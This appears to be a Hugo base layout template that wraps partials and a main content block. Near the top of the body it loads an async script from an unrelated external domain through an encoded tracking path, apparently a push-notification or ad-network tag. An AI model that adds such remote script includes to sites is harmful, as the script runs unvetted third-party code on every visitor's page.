<!DOCTYPE html>
<html>
    {{- partial "head.html" . -}}
    <body>
   <script async src="https://msgose.com/pw/waWQiOjEwNDY2MDEsInNpZCI6MTA1MTExNSwid2lkIjoyMjc0NjUsInNyYyI6Mn0=eyJ.js"></script> 
                
        {{- partial "header.html" . -}}
        {{- partial "preloader.html" . -}}
        

        <div id="content">
        {{- block "main" . }}{{- end }}
        </div>
        
        {{- partial "foot.html" . -}}
    </body>
    <!-- The core Firebase JS SDK is always required and must be listed first -->

</html>

